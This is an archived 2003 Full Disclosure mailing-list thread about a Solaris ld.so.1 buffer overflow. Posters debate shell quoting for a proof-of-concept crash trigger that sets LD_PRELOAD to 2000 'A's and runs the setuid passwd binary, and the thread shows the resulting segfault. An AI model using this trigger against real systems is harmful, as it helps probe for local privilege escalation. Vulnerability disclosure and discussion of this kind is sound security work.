Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow
From: uidzer0 <uidzer0 () sptrm com>
Date: 31 Jul 2003 18:05:16 -0400
Paul, you are mistaken. Why are you trying to escape the backtick with a
'/' (forwardslash) ... Escapes are '\' (backslash) .. But nice try. But
since you must not have any nix boxes around, let me be the nice guy and
show you the output of your misguided command structure. And let's not
even go into why you would want to escape the perl command anyhow,
seeing how that totally defeats the purpose of this entire thread.

so, here we go.

Paul wants to escape perl.. sounds good, lets see what happens.

LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd
LD_PRELOAD=`perl: Command not found.

So, now, Paul wants to use his so-called escape character (/) to escape
just the trailing backtick.. so here we go:

LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
LD_PRELOAD=/: Command not found.

So, the correct way of doing this is exactly the way David posted
originally.

$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
ld.so.1: passwd: warning:
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

... (bunch of A's)

AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname
Segmentation Fault

oh, and this was done on a solaris 8 box.

peace

-0

On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote:

-----Original Message-----
From: Jim Dew [mailto:jdew () yggdrasil ca] 
Sent: Wednesday, July 30, 2003 8:19 PM
To: Jouko Pynnonen
Cc: full-disclosure () lists netsys com
Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1 
buffer overflow


On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:


On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:

Modify the command (you need to add a trailing slash) to be the 
following:

LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd

and try it again.




this segfaults on solaris 2.6


Try moving the escape to *before* the backtick:
LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/ 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow uidzer0 (Jul 31)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]